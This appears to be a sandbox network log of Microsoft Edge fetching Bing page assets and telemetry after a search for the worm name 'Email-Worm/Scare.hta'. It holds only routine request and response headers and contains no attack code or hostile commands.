user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK

Response

HTTP/2.0 200

content-length: 15436
content-type: font/woff2
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
x-eventid: 674f25384d934917bebff6d8d28459e2
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-vykrJTcs8zY4FGIopCYP40g10yPJ8eLRGmvQwWkuRYU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Wed, 12 Mar 2025 02:37:02 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747022.32df158
GET

https://www.bing.com/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK

Response

HTTP/2.0 200

expires: Tue, 11 Mar 2025 14:31:18 GMT
last-modified: Tue, 24 Sep 2024 06:53:27 GMT
etag: 0x8DCDC6597B401F0
cache-control: public, no-transform, max-age=43315
akamai-amd-bc-debug: [a=92.122.211.103,b=46456250,c=c,d=1741699202,h=304,k=20,l=1,n=GB_EN_LONDON,o=20940,r=21]
akamai-grn: 0.5eba1302.1738051100.137500c9
timing-allow-origin: *
content-length: 9310
content-type: image/png
content-md5: GUexVzkiHrDbJxwd2PleRg==
x-ms-request-id: 490b4d38-e01e-005f-1926-15186e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
date: Wed, 12 Mar 2025 02:37:02 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747022.32df1c1
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.HeaderScopeOrder%22,%22FID%22:%22CI%22,%22Name%22:%22ScopeMapOrderValue%22,%22Text%22:%220%3A0%2C1%3A1%2C2%3A2%2C3%3A3%2C4%3A4%2C5%3A5%2C6%3A6%2C8%3A7%2C7%3A8%2C9%3A9%22,%22SDK%22:%22SJ%22}]

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.HeaderScopeOrder%22,%22FID%22:%22CI%22,%22Name%22:%22ScopeMapOrderValue%22,%22Text%22:%220%3A0%2C1%3A1%2C2%3A2%2C3%3A3%2C4%3A4%2C5%3A5%2C6%3A6%2C8%3A7%2C7%3A8%2C9%3A9%22,%22SDK%22:%22SJ%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:02 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747022.32df289
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:69,%22BC%22:337,%22SE%22:-1,%22TC%22:-1,%22H%22:430,%22BP%22:431,%22CT%22:434,%22IL%22:2},%22ad%22:[-1,-1,1263,601,1263,2731,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:69,%22BC%22:337,%22SE%22:-1,%22TC%22:-1,%22H%22:430,%22BP%22:431,%22CT%22:434,%22IL%22:2},%22ad%22:[-1,-1,1263,601,1263,2731,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK

Response

HTTP/2.0 200

content-length: 4286
content-type: image/x-icon
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
x-eventid: 67541e1598d343c390f2680d191d299d
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-OyN0bFjTjUVCzFNOLA6gZ6vR7JOqgi1yfid8nbabuCY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df2c5
GET

https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg.ico

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /sa/simg/favicon-trans-bg-blue-mg.ico HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK

Response

HTTP/2.0 200

content-length: 8162
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 3rqf0p3t7DfsvGGJk0Bm9Q==
last-modified: Tue, 11 Mar 2025 01:30:55 GMT
etag: 0x8DD603C5E22A93F
x-ms-request-id: a69c95cd-b01e-0047-5a60-9235fb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=432000
expires: Sun, 16 Mar 2025 08:33:30 GMT
akamai-grn: 0.af901002.1741682010.b1357e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df2cf
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

88.221.135.33:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 379
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df2c6
GET

https://www.bing.com/rp/l-yS6iZ5vQqwJ9ur5vosaqxfLGQ.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/l-yS6iZ5vQqwJ9ur5vosaqxfLGQ.br.js HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df2c4
GET

https://www.bing.com/rewardsapp/widgetassets/prod/medallion/1.4.3/js/widget.js?t=250311

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rewardsapp/widgetassets/prod/medallion/1.4.3/js/widget.js?t=250311 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK

Response

HTTP/2.0 200

expires: Sun, 09 Mar 2025 14:58:37 GMT
last-modified: Tue, 24 Sep 2024 06:45:05 GMT
etag: 0x8DCDC646C9AF5F4
cache-control: public, no-transform, max-age=152446
akamai-grn: 0.c3777b5c.1738108398.9348160
content-length: 1929
content-type: image/png
content-md5: TBVfy13T2kZEUa0kC23mBg==
x-ms-request-id: 1d60634c-401e-0052-2736-1bf762000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
timing-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df2fe
GET

https://www.bing.com/rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
